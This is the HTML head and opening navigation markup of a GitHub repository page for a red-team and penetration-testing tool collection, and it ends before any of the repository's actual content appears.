CINXE.COM
GitHub - A-poc/RedTeam-Tools: Tools and Techniques for Red Team / Penetration Testing
<!DOCTYPE html> <html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system" data-a11y-link-underlines="true" > <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com"> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/light-74231a1f3bbb.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/dark-8a995f0bacd4.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-f37fb7684b1f.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-9ac301c3ebe5.css" /><link data-color-theme="dark_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-cd826e8636dc.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_colorblind-f91b0f603451.css" /><link data-color-theme="light_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_high_contrast-83beb16e0ecf.css" /><link data-color-theme="light_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_tritanopia-6e122dab64fc.css" /><link data-color-theme="dark_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_tritanopia-18119e682df0.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/primer-primitives-225433424a87.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/primer-aaa714e5674d.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/global-7eaba1d4847c.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/github-ea73c9cb5377.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/repository-4fce88777fa8.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/code-0210be90f4d3.css" /> <script type="application/json" id="client-env">{"locale":"en","featureFlags":["a11y_quote_reply_fix","copilot_immersive_issue_preview","copilot_new_references_ui","copilot_chat_repo_custom_instructions_preview","copilot_no_floating_button","copilot_topics_as_references","copilot_read_shared_conversation","copilot_duplicate_thread","copilot_buffered_streaming","dotcom_chat_client_side_skills","experimentation_azure_variant_endpoint","failbot_handle_non_errors","fgpat_form_ui_updates","geojson_azure_maps","ghost_pilot_confidence_truncation_25","ghost_pilot_confidence_truncation_40","github_models_o3_mini_streaming","insert_before_patch","issues_react_remove_placeholders","issues_react_blur_item_picker_on_close","marketing_pages_search_explore_provider","primer_react_css_modules_ga","react_data_router_pull_requests","remove_child_patch","report_hydro_web_vitals","sample_network_conn_type","swp_enterprise_contact_form","site_proxima_australia_update","viewscreen_sandbox","issues_react_create_milestone","issues_react_cache_fix_workaround","lifecycle_label_name_updates","copilot_task_oriented_assistive_prompts","issue_types_prevent_private_type_creation","refresh_image_video_src","react_router_dispose_on_disconnect","codespaces_prebuild_region_target_update","turbo_app_id_restore","copilot_code_review_sign_up_closed"]}</script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/wp-runtime-ef1df83eabdf.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js-9da652f58479.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_arianotify-polyfill_ariaNotify-polyfill_js-node_modules_github_mi-3abb8f-46b9f4874d95.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_failbot_failbot_ts-75968cfb5298.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/environment-f04cb2a9fc8c.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_index_mjs-0dbb79f97f8f.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-f690fd9ae3d5.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-62d275b7ddd9.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_text-expander-element_dist_index_js-78748950cb0c.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_js-node_modules_github_catalyst_-8e9f78-a90ac05d2469.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-b5f1d7-a1760ffda83d.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_markdown-toolbar-element_dist_index_js-ceef33f593fa.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_primer_view-co-c44a69-efa32db3a345.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/github-elements-394f8eb34f19.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-8206a1f1fc89.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_braintree_browser-detection_dist_browser-detection_js-node_modules_githu-2906d7-2a07a295af40.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-be8cb88f481b.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_morphdom_dist_morphdom-e-7c534c-a4a1922eb55f.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-a03ee12d659a.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-893f9f-b6294cf703b7.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-e3180fe3bcb3.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_quote-selection_dist_index_js-node_modules_github_session-resume_-947061-e7a6c4a19f98.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_updatable-content_updatable-content_ts-2a55124d5c52.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_modules_github_sso_ts-ui_packages-900dde-768abe60b1f8.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-3e000c5d31a9.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_modules_github_behaviors_include-87a4ae-b8865f653f6b.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-e429cff6ceb1.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-8c474dd4309b.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-f6223d90c7ba.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/notifications-global-01e85cd1be94.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_template-parts_lib_index_js-94dc7a2157c1.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-70450e-4b93df70b903.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_ref-selector_ts-3e9d848bab5f.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/codespaces-c3bcacfe317c.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-3eebbd-0763620ad7bf.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_decorators_js-node_modules_delegated-events_di-e161aa-9d41fb1b6c9e.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_remote--3c9c82-b71ef90fbdc7.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/repositories-7a0dbaa42c57.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_catalyst_lib_inde-dbbea9-26cce2010167.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/code-menu-1c0aedc134b1.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/primer-react-e05a7c4c5398.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/react-core-cee80bd425f0.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/react-lib-f1bca44e0926.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/octicons-react-cf2f2ab8dab4.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_emotion_is-prop-valid_dist_emotion-is-prop-valid_esm_js-node_modules_emo-62da9f-2df2f32ec596.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_stacktrace-parser_dist_s-e7dcdd-9a233856b02c.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover-fn_js-55fea94174bf.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/notifications-subscriptions-menu-58a0c58bfee4.js"></script> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/primer-react.423a6445b565d6511bd7.module.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/notifications-subscriptions-menu.1bcff9205c241e99cff2.module.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/primer-react.423a6445b565d6511bd7.module.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/notifications-subscriptions-menu.1bcff9205c241e99cff2.module.css" /> <title>GitHub - A-poc/RedTeam-Tools: Tools and Techniques for Red Team / Penetration Testing</title> <meta name="route-pattern" content="/:user_id/:repository" data-turbo-transient> <meta name="route-controller" content="files" data-turbo-transient> <meta name="route-action" content="disambiguate" data-turbo-transient> <meta name="current-catalog-service-hash" content="f3abb0cc802f3d7b95fc8762b94bdcb13bf39634c40c357301c4aa1d67a256fb"> <meta name="request-id" content="CBAA:362764:95416:BC0D9:67E477CA" data-pjax-transient="true"/><meta name="html-safe-nonce" content="b104a0c71a2e666a31cb48e168c95906e4ca6f0b793072c7cda76cde35f02e20" data-pjax-transient="true"/><meta name="visitor-payload" content="eyJyZWZlcnJlciI6IiIsInJlcXVlc3RfaWQiOiJDQkFBOjM2Mjc2NDo5NTQxNjpCQzBEOTo2N0U0NzdDQSIsInZpc2l0b3JfaWQiOiI1Mzk1ODAzNzg1NDkwODg4NjUwIiwicmVnaW9uX2VkZ2UiOiJzb3V0aGVhc3Rhc2lhIiwicmVnaW9uX3JlbmRlciI6InNvdXRoZWFzdGFzaWEifQ==" data-pjax-transient="true"/><meta name="visitor-hmac" content="8b5c35f200135e85996ba52bad04e21c0a9137817a61531b6cbf5be14fc920d1" data-pjax-transient="true"/> <meta name="hovercard-subject-tag" content="repository:538444958" data-turbo-transient> <meta name="github-keyboard-shortcuts" content="repository,copilot" data-turbo-transient="true" /> <meta name="selected-link" value="repo_source" data-turbo-transient> <link rel="assets" href="https://github.githubassets.com/"> <meta name="google-site-verification" content="Apib7-x98H0j5cPqHWwSMm6dNU4GmODRoqxLiDzdx9I"> <meta name="octolytics-url" content="https://collector.github.com/github/collect" /> <meta name="analytics-location" content="/<user-name>/<repo-name>" data-turbo-transient="true" /> <meta name="user-login" content=""> <meta name="viewport" content="width=device-width"> <meta name="description" content="Tools and Techniques for Red Team / Penetration Testing - A-poc/RedTeam-Tools"> <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub"> <link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905, app-argument=https://github.com/A-poc/RedTeam-Tools" /> <meta name="twitter:image" content="https://repository-images.githubusercontent.com/538444958/33b16c58-8190-43af-814f-3ba8ee1e51f0" /><meta name="twitter:site" content="@github" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="GitHub - A-poc/RedTeam-Tools: Tools and Techniques for Red Team / Penetration Testing" /><meta name="twitter:description" content="Tools and Techniques for Red Team / Penetration Testing - A-poc/RedTeam-Tools" /> <meta property="og:image" content="https://repository-images.githubusercontent.com/538444958/33b16c58-8190-43af-814f-3ba8ee1e51f0" /><meta property="og:image:alt" content="Tools and Techniques for Red Team / Penetration Testing - A-poc/RedTeam-Tools" /><meta property="og:site_name" content="GitHub" /><meta property="og:type" content="object" /><meta property="og:title" content="GitHub - A-poc/RedTeam-Tools: Tools and Techniques for Red Team / Penetration Testing" /><meta property="og:url" content="https://github.com/A-poc/RedTeam-Tools" /><meta property="og:description" content="Tools and Techniques for Red Team / Penetration Testing - A-poc/RedTeam-Tools" /> <meta name="hostname" content="github.com"> <meta name="expected-hostname" content="github.com"> <meta http-equiv="x-pjax-version" content="36ab67df9bf4989ef8ed2e06f94d896e9178e8671ab853c9797a40256bbb5b07" data-turbo-track="reload"> <meta http-equiv="x-pjax-csp-version" content="77190eb53eb47fc30bd2fcc17a7eefa2dfd8505869fee9299ba911be3a40a9eb" data-turbo-track="reload"> <meta http-equiv="x-pjax-css-version" content="911af613659f2a8ff08d51fd492330c9e8a6ed8f0c4eb3c6632db43599431d16" data-turbo-track="reload"> <meta http-equiv="x-pjax-js-version" content="1f10a48d0df4e4dabe978468d5865bcd49902d5760348cf96d5a1f70b3e5452d" data-turbo-track="reload"> <meta name="turbo-cache-control" content="no-preview" data-turbo-transient=""> <meta data-hydrostats="publish"> <meta name="go-import" content="github.com/A-poc/RedTeam-Tools git https://github.com/A-poc/RedTeam-Tools.git"> <meta name="octolytics-dimension-user_id" content="100603074" /><meta name="octolytics-dimension-user_login" content="A-poc" /><meta name="octolytics-dimension-repository_id" content="538444958" /><meta name="octolytics-dimension-repository_nwo" content="A-poc/RedTeam-Tools" /><meta name="octolytics-dimension-repository_public" content="true" /><meta name="octolytics-dimension-repository_is_fork" content="false" /><meta name="octolytics-dimension-repository_network_root_id" content="538444958" /><meta name="octolytics-dimension-repository_network_root_nwo" content="A-poc/RedTeam-Tools" /> <link rel="canonical" href="https://github.com/A-poc/RedTeam-Tools" data-turbo-transient> <meta name="turbo-body-classes" content="logged-out env-production page-responsive"> <meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats"> <meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors"> <meta name="release" content="8742ee622bfde39c04569924fdfbc83c769a1129"> <link rel="mask-icon" href="https://github.githubassets.com/assets/pinned-octocat-093da3e6fa40.svg" color="#000000"> <link rel="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg" data-base-href="https://github.githubassets.com/favicons/favicon"> <meta name="theme-color" content="#1e2327"> <meta name="color-scheme" content="light dark" /> <link rel="manifest" href="/manifest.json" crossOrigin="use-credentials"> </head> <body class="logged-out env-production page-responsive" style="word-wrap: break-word;"> <div data-turbo-body class="logged-out env-production page-responsive" style="word-wrap: break-word;"> <div class="position-relative header-wrapper js-header-wrapper "> <a href="#start-of-content" data-skip-target-assigned="false" class="px-2 py-4 color-bg-accent-emphasis color-fg-on-emphasis show-on-focus js-skip-to-content">Skip to content</a> <span data-view-component="true" class="progress-pjax-loader Progress position-fixed width-full"> <span style="width: 0%;" data-view-component="true" class="Progress-item progress-pjax-loader-bar left-0 top-0 color-bg-accent-emphasis"></span> </span> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_ui-commands_ui-commands_ts-2ea4e93613c0.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/keyboard-shortcuts-dialog-33dfb803e078.js"></script> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/primer-react.423a6445b565d6511bd7.module.css" /> <react-partial partial-name="keyboard-shortcuts-dialog" data-ssr="false" data-attempted-ssr="false" > <script type="application/json" data-target="react-partial.embeddedData">{"props":{"docsUrl":"https://docs.github.com/get-started/accessibility/keyboard-shortcuts"}}</script> <div data-target="react-partial.reactRoot"></div> </react-partial> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-4898d1bf4b51.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/sessions-730dca81d0a2.js"></script> <header class="HeaderMktg header-logged-out js-details-container js-header Details f4 py-3" role="banner" data-is-top="true" data-color-mode=light data-light-theme=light data-dark-theme=dark> <h2 class="sr-only">Navigation Menu</h2> <button type="button" class="HeaderMktg-backdrop d-lg-none border-0 position-fixed top-0 left-0 width-full height-full js-details-target" aria-label="Toggle navigation"> <span class="d-none">Toggle navigation</span> </button> <div class="d-flex flex-column flex-lg-row flex-items-center px-3 px-md-4 px-lg-5 height-full position-relative z-1"> <div class="d-flex flex-justify-between flex-items-center width-full width-lg-auto"> <div class="flex-1"> <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target js-nav-padding-recalculate js-header-menu-toggle Button--link Button--medium Button d-lg-none color-fg-inherit p-1"> <span class="Button-content"> <span class="Button-label"><div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div></span> </span> </button> </div> <a class="mr-lg-3 color-fg-inherit flex-order-2 js-prevent-focus-on-mobile-nav" href="/" aria-label="Homepage" data-analytics-event="{"category":"Marketing nav","action":"click to go to homepage","label":"ref_page:Marketing;ref_cta:Logomark;ref_loc:Header"}"> <svg height="32" aria-hidden="true" viewBox="0 0 24 24" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github"> <path d="M12 1C5.9225 1 1 5.9225 1 12C1 16.8675 4.14875 20.9787 8.52125 22.4362C9.07125 22.5325 9.2775 22.2025 9.2775 21.9137C9.2775 21.6525 9.26375 20.7862 9.26375 19.865C6.5 20.3737 5.785 19.1912 5.565 18.5725C5.44125 18.2562 4.905 17.28 4.4375 17.0187C4.0525 16.8125 3.5025 16.3037 4.42375 16.29C5.29 16.2762 5.90875 17.0875 6.115 17.4175C7.105 19.0812 8.68625 18.6137 9.31875 18.325C9.415 17.61 9.70375 17.1287 10.02 16.8537C7.5725 16.5787 5.015 15.63 5.015 11.4225C5.015 10.2262 5.44125 9.23625 6.1425 8.46625C6.0325 8.19125 5.6475 7.06375 6.2525 5.55125C6.2525 5.55125 7.17375 5.2625 9.2775 6.67875C10.1575 6.43125 11.0925 6.3075 12.0275 6.3075C12.9625 6.3075 13.8975 6.43125 14.7775 6.67875C16.8813 5.24875 17.8025 5.55125 17.8025 5.55125C18.4075 7.06375 18.0225 8.19125 17.9125 8.46625C18.6138 9.23625 19.04 10.2125 19.04 11.4225C19.04 15.6437 16.4688 16.5787 14.0213 16.8537C14.42 17.1975 14.7638 17.8575 14.7638 18.8887C14.7638 20.36 14.75 21.5425 14.75 21.9137C14.75 22.2025 14.9563 22.5462 15.5063 22.4362C19.8513 20.9787 23 16.8537 23 12C23 5.9225 18.0775 1 12 1Z"></path> </svg> </a> <div class="flex-1 flex-order-2 text-right"> <a href="/login?return_to=https%3A%2F%2Fgithub.com%2FA-poc%2FRedTeam-Tools" class="HeaderMenu-link HeaderMenu-button d-inline-flex d-lg-none flex-order-1 f5 no-underline border color-border-default rounded-2 px-2 py-1 color-fg-inherit js-prevent-focus-on-mobile-nav" data-hydro-click="{"event_type":"authentication.click","payload":{"location_in_page":"site header menu","repository_id":null,"auth_type":"SIGN_UP","originating_url":"https://github.com/A-poc/RedTeam-Tools","user_id":null}}" data-hydro-click-hmac="e554e53a29a9ced4fac52fb8dc6438e79d769127444c682a0707c61465cad295" data-analytics-event="{"category":"Marketing nav","action":"click to Sign in","label":"ref_page:Marketing;ref_cta:Sign in;ref_loc:Header"}" > Sign in </a> </div> </div> <div class="HeaderMenu js-header-menu height-fit position-lg-relative d-lg-flex flex-column flex-auto top-0"> <div class="HeaderMenu-wrapper d-flex flex-column flex-self-start flex-lg-row flex-auto rounded rounded-lg-0"> <nav class="HeaderMenu-nav" aria-label="Global"> <ul class="d-lg-flex list-style-none"> <li class="HeaderMenu-item position-relative flex-wrap flex-justify-between flex-items-center d-block d-lg-flex flex-lg-nowrap flex-lg-items-center js-details-container js-header-menu-item"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Product <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path> </svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 pt-2 pt-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 pb-2 pb-lg-4 d-lg-flex flex-wrap dropdown-menu-wide"> <div class="HeaderMenu-column px-lg-4 border-lg-right mb-4 mb-lg-0 pr-lg-7"> <div class="border-bottom pb-3 pb-lg-0 border-lg-bottom-0"> <ul class="list-style-none f5" > <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary d-flex flex-items-center Link--has-description pb-lg-3" data-analytics-event="{"location":"navbar","action":"github_copilot","context":"product","tag":"link","label":"github_copilot_link_product_navbar"}" href="https://github.com/features/copilot"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-copilot color-fg-subtle mr-3"> <path d="M23.922 16.992c-.861 1.495-5.859 5.023-11.922 5.023-6.063 0-11.061-3.528-11.922-5.023A.641.641 0 0 1 0 16.736v-2.869a.841.841 0 0 1 .053-.22c.372-.935 1.347-2.292 2.605-2.656.167-.429.414-1.055.644-1.517a10.195 10.195 0 0 1-.052-1.086c0-1.331.282-2.499 1.132-3.368.397-.406.89-.717 1.474-.952 1.399-1.136 3.392-2.093 6.122-2.093 2.731 0 4.767.957 6.166 2.093.584.235 1.077.546 1.474.952.85.869 1.132 2.037 1.132 3.368 0 .368-.014.733-.052 1.086.23.462.477 1.088.644 1.517 1.258.364 2.233 1.721 2.605 2.656a.832.832 0 0 1 .053.22v2.869a.641.641 0 0 1-.078.256ZM12.172 11h-.344a4.323 4.323 0 0 1-.355.508C10.703 12.455 9.555 13 7.965 13c-1.725 0-2.989-.359-3.782-1.259a2.005 2.005 0 0 1-.085-.104L4 11.741v6.585c1.435.779 4.514 2.179 8 2.179 3.486 0 6.565-1.4 8-2.179v-6.585l-.098-.104s-.033.045-.085.104c-.793.9-2.057 1.259-3.782 1.259-1.59 0-2.738-.545-3.508-1.492a4.323 4.323 0 0 1-.355-.508h-.016.016Zm.641-2.935c.136 1.057.403 1.913.878 2.497.442.544 1.134.938 2.344.938 1.573 0 2.292-.337 2.657-.751.384-.435.558-1.15.558-2.361 0-1.14-.243-1.847-.705-2.319-.477-.488-1.319-.862-2.824-1.025-1.487-.161-2.192.138-2.533.529-.269.307-.437.808-.438 1.578v.021c0 .265.021.562.063.893Zm-1.626 0c.042-.331.063-.628.063-.894v-.02c-.001-.77-.169-1.271-.438-1.578-.341-.391-1.046-.69-2.533-.529-1.505.163-2.347.537-2.824 1.025-.462.472-.705 1.179-.705 2.319 0 1.211.175 1.926.558 2.361.365.414 1.084.751 2.657.751 1.21 0 1.902-.394 2.344-.938.475-.584.742-1.44.878-2.497Z"></path><path d="M14.5 14.25a1 1 0 0 1 1 1v2a1 1 0 0 1-2 0v-2a1 1 0 0 1 1-1Zm-5 0a1 1 0 0 1 1 1v2a1 1 0 0 1-2 0v-2a1 1 0 0 1 1-1Z"></path> </svg> <div> <div class="color-fg-default h4">GitHub Copilot</div> Write better code with AI </div> </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary d-flex flex-items-center Link--has-description pb-lg-3" data-analytics-event="{"location":"navbar","action":"security","context":"product","tag":"link","label":"security_link_product_navbar"}" href="https://github.com/features/security"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-shield-check color-fg-subtle mr-3"> <path d="M16.53 9.78a.75.75 0 0 0-1.06-1.06L11 13.19l-1.97-1.97a.75.75 0 0 0-1.06 1.06l2.5 2.5a.75.75 0 0 0 1.06 0l5-5Z"></path><path d="m12.54.637 8.25 2.675A1.75 1.75 0 0 1 22 4.976V10c0 6.19-3.771 10.704-9.401 12.83a1.704 1.704 0 0 1-1.198 0C5.77 20.705 2 16.19 2 10V4.976c0-.758.489-1.43 1.21-1.664L11.46.637a1.748 1.748 0 0 1 1.08 0Zm-.617 1.426-8.25 2.676a.249.249 0 0 0-.173.237V10c0 5.46 3.28 9.483 8.43 11.426a.199.199 0 0 0 .14 0C17.22 19.483 20.5 15.461 20.5 10V4.976a.25.25 0 0 0-.173-.237l-8.25-2.676a.253.253 0 0 0-.154 0Z"></path> </svg> <div> <div class="color-fg-default h4">Security</div> Find and fix vulnerabilities </div> </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary d-flex flex-items-center Link--has-description pb-lg-3" data-analytics-event="{"location":"navbar","action":"actions","context":"product","tag":"link","label":"actions_link_product_navbar"}" href="https://github.com/features/actions"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-workflow color-fg-subtle mr-3"> <path d="M1 3a2 2 0 0 1 2-2h6.5a2 2 0 0 1 2 2v6.5a2 2 0 0 1-2 2H7v4.063C7 16.355 7.644 17 8.438 17H12.5v-2.5a2 2 0 0 1 2-2H21a2 2 0 0 1 2 2V21a2 2 0 0 1-2 2h-6.5a2 2 0 0 1-2-2v-2.5H8.437A2.939 2.939 0 0 1 5.5 15.562V11.5H3a2 2 0 0 1-2-2Zm2-.5a.5.5 0 0 0-.5.5v6.5a.5.5 0 0 0 .5.5h6.5a.5.5 0 0 0 .5-.5V3a.5.5 0 0 0-.5-.5ZM14.5 14a.5.5 0 0 0-.5.5V21a.5.5 0 0 0 .5.5H21a.5.5 0 0 0 .5-.5v-6.5a.5.5 0 0 0-.5-.5Z"></path> </svg> <div> <div class="color-fg-default h4">Actions</div> Automate any workflow </div> </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary d-flex flex-items-center Link--has-description pb-lg-3" data-analytics-event="{"location":"navbar","action":"codespaces","context":"product","tag":"link","label":"codespaces_link_product_navbar"}" 